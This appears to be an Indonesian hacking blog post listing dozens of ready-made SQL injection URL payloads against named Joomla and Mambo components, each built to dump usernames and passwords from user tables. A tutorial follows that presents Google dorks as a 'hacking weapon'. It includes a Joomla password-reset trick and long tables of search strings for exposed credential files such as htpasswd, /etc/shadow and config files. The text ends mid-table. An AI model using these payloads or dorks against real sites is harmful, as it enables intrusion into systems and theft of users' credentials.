Dork SQL dan Exploit + ATSCAN 2
Oleh
chmood
*SQL Injection The site is powered by Joomla CMS*
"index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
"index.php?option=com_clasifier&Itemid=61&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_simpleshop&Itemid=41&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
"index.php?option=com_galeria&Itemid=61&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*",
"index.php?option=com_jooget&Itemid=61&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=2&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_xfaq&task=answer&Itemid=42&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
"index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email),2,3,4,5/**/%20from/**/%20jos_users/*",
"index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password),0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/",
"index.php?option=com_marketplace&page=show_category&catid=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*",
"index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*",
"index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--",
"index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*",
"index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*",
"index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),777,666,555,444,333,222,111%20from%20jos_users/*",
"index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*",
"index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*",
"index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fjos_users/*",
"index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=%20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*",
"index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*",
"index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*",
"index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/jos_users/*",
"index.php?option=com_product&Itemid=12&task=viewlist&catid=-9999999/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_users/*",
"index.php?option=com_cms&act=viewitems&cat_id=-9999999/**/union/**/select/**/111,111,concat(username,0x3a,password),222,222,333,333/**/from/**/jos_users/*",
"index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/*",
"index.php?option=com_idvnews&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2222,concat(username,0x3a,password),0,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/*",
"index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*",
"index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*",
"index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/jos_users/*",
"index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/jos_users/*&results=joomla",
"index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/jos_users/*",
"index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999/**/union/**/select/**/concat(username,0x3a,password),username,password,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--",
"index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*",
"index.php?option=com_resman&task=moreinfo&id=-1%20union%20select%20111,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),333%20from%20jos_users/*"]
SQL Injection The site is powered by Mambo CMS
index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
"index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*",
"index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--",
"index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
"index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
"index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
"index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
"index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*", "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*",
"index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/*",
"index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),0x3a/**/from/**/jos_users/*",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--",
"administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
"index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*",
"index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
"index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*",
"index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--"]
Banyak pencarian yang kita inginkan pada search engines tidak seperti yang diharapkan, mengapa? karena keyword yang anda masukan kurang sesuai dengan keyword-keyword yang tersimpan di mesin search engines.
Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas (dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat melakukan hacking (melihat password) account orang lain yang terindex oleh google.
Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:
intitle
allintitle
(Mencari judul/title pada suatu web)
inurl
allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini
intitle:”index of/avenged”
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:”index of” “skripsi” site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
dan ini contoh2 lain dalam penggunaan google dork
inurl:”guest | book” “html allowed”
inurl:password.log
intitle:”index of” password.txt site:my
intitle:”index of” admin.mdb
intitle:”index of” member.mdb
intitle:”phpmyadmin” “running on localhost”
intitle:”index of” “data base” site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (‘).
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:”option=com_user”
lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi
lalu ketikan token ‘
dan apa hasilnya, password sudah bisa kita reset ulang,,,,
sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.
tulisannya kecil-kecil ya? emang saya buat segitu?bir pada usaha kalau mau belajar,hahaha
Intinya jangan dibuat macam-macam ya? kalau gak bisa atau kenapa-napa saya tidak bertanggung jawab ya?hahahaha….. ^_^
Berikut kata kunci dari google dork tersebut…..
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————
TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
———————————————————
filetype:config config intext: |Microsoft .NET application credentials
appSettings “User ID”
———————————————————
filetype:pwd service |Microsoft FrontPage Service Web passwords
———————————————————
intitle:index.of |Microsoft FrontPage Web credentials
administrators.pwd
———————————————————
“# -FrontPage-” |Microsoft FrontPage Web passwords
inurl:service.pwd
ext:pwd inurl:_vti_pvt inurl: |Microsoft FrontPage Web passwords
(Service | authors | administrators)
———————————————————
inurl:perform filetype:ini |mIRC nickserv credentials
———————————————————
intitle:”index of” intext: |mySQL database credentials
connect.inc
———————————————————
intitle:”index of” intext: |mySQL database credentials
globals.inc
———————————————————
filetype:conf oekakibbs |Oekakibss user passwords
———————————————————
filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
———————————————————
inurl:ospfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
———————————————————
index.of passlist |Passlist user credentials
———————————————————
inurl:passlist.txt |passlist.txt file user credentials
———————————————————
filetype:dat “password.dat” |password.dat files
———————————————————
inurl:password.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
———————————————————
filetype:log inurl:”password.log” |password.log files cleartext
|passwords
———————————————————
inurl:people.lst filetype:lst |People.lst generic password file
———————————————————
intitle:index.of config.php |PHP Configuration File database
|credentials
———————————————————
inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
———————————————————
inurl:nuke filetype:sql |PHP-Nuke credentials
———————————————————
filetype:conf inurl:psybnc.conf |psyBNC IRC user credentials
“USER.PASS=”
———————————————————
filetype:ini ServUDaemon |servU FTP Daemon credentials
———————————————————
filetype:conf slapd.conf |slapd configuration files root password
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
———————————————————
inurl:”slapd.conf” intext: |slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
———————————————————
filetype:sql “IDENTIFIED BY” –cvs |SQL passwords
———————————————————
filetype:sql password |SQL passwords
———————————————————
filetype:ini wcx_ftp |Total Commander FTP passwords
———————————————————
filetype:netrc password |UNIX .netrc user credentials
———————————————————
index.of.etc |UNIX /etc directories contain
|various credential files
———————————————————
intitle:”Index of..etc” passwd |UNIX /etc/passwd user credentials
———————————————————
intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
———————————————————
intitle:”Index of” pwd.db |UNIX /etc/pwd.db credentials
———————————————————
intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
———————————————————
intitle:index.of master.passwd |UNIX master.passwd user credentials
———————————————————
intitle:”Index of” spwd.db |UNIX spwd.db credentials
passwd -pam.conf
———————————————————
filetype:bak inurl:”htaccess| |UNIX various password file backups
passwd|shadow|htusers
———————————————————
filetype:inc dbconn |Various database credentials
———————————————————
filetype:inc intext:mysql_ |Various database credentials, server names
connect
———————————————————
filetype:properties inurl:db |Various database credentials, server names
intext:password
———————————————————
inurl:vtund.conf intext:pass –cvs |Virtual Tunnel Daemon passwords
———————————————————
inurl:”wvdial.conf” intext: |wdial dialup user credentials
”password”
———————————————————
filetype:mdb wwforum |Web Wiz Forums Web credentials
———————————————————
“AutoCreate=TRUE password=*” |Website Access Analyzer user passwords
———————————————————
filetype:pwl pwl |Windows Password List user credentials
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”defaultusername” intext: |credentials
”defaultpassword”
———————————————————
filetype:reg reg +intext: |Windows Registry Keys containing user
”internet account manager” |credentials
———————————————————
“index of/” “ws_ftp.ini” |WS_FTP FTP credentials
“parent directory”
———————————————————
filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
———————————————————
inurl:/wwwboard |wwwboard user credentials
———————————————————
mungkin temen2 ada yang ingin melihat password dari website jerman?
mungkin sebaiknya kita juga mengganti kata “password” dengan memakai bahasa jerman tentunya dibawah ini adalah tabel 5 negara beserta terjemahan password dalam bahasa masing2 negara.
—————————————————–
BAHASA |KATA-KATA| TRANSLATE
—————————————————–
